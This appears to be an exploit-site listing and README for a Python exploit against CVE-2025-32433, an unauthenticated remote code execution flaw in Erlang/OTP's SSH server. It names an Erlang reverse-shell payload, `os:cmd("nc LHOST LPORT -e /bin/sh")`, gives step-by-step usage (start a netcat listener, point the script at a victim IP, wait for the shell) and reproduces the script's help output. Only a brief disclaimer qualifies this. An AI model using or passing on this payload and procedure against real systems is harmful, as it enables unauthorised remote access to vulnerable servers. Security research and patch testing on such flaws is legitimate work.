Exploit for Missing Authentication for Critical Function in Erlang Erlang\/Otp CVE-2025-32433

Name: Exploit for Missing Authentication for Critical Function in Erlang Erlang/Otp CVE-2025-32433
Rating: 5 (224 reviews)
2025-06-09 | CVSS 10.0
## https://sploitus.com/exploit?id=EB1C8ABF-8BCF-5271-8CEE-8FC722F01045
# CVE-2025-32433 Erlang SSH Library Exploit 🛑

# Description:

Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions `OTP-27.3.3`, `OTP-26.2.5.11`, and `OTP-25.3.2.20`, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This issue is patched in versions `OTP-27.3.3`, `OTP-26.2.5.11`, and `OTP-25.3.2.20`. A temporary workaround involves disabling the SSH server or to prevent access via firewall rules.

# Metrics:

CNA: `GitHub`, Inc. Base Score: 10.0 CRITICAL ⚫ Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

# Features:

+ Original exploit by Matthew Keeley
+ Updated version by Tyler Ramsbey:
  1. Command‑line arguments for LHOST, LPORT, RHOST, and RPORT
  2. Built‑in help and usage via `argparse`
  3. Erlang‑style reverse shell payload using `os:cmd("nc LHOST LPORT -e /bin/sh").`
  4. Clean function decomposition and status logging for each stage

# Prerequisites:

+ Python3
+ A working `nc` (Netcat) listener on your attack machine
+ Network access to the target SSH service (default port `22`)

# Usage:

1. Start your listener on the attack box:

```
nc -lvnp 4444
```

2. Run the exploit:

```
python3 CVE-2025-32433.py -lh [Attacker-IP] -lp [Attacker-Port] -rh [Victim-IP] -rp [Victim-Port]
```

3. Wait for the shell to connect back to your listener.

# Help Menu:

```
$ python3 CVE-2025-32433.py -h
usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]

Send a pre-auth SSH channel request with an Erlang RCE payload
to get a reverse shell

optional arguments:
  -h, --help            show this help message and exit
  -lh LHOST, --lhost LHOST
                        Local host/IP to receive the reverse shell
  -lp LPORT, --lport LPORT
                        Local port to receive the reverse shell
  -rh RHOST, --rhost RHOST
                        Target SSH server IP (default: 10.10.10.10)
  -rp RPORT, --rport RPORT
                        Target SSH server port (default: 22)
```

# Disclaimer ⚠️

For educational and research purposes only. Use only against systems you own or have permission to test.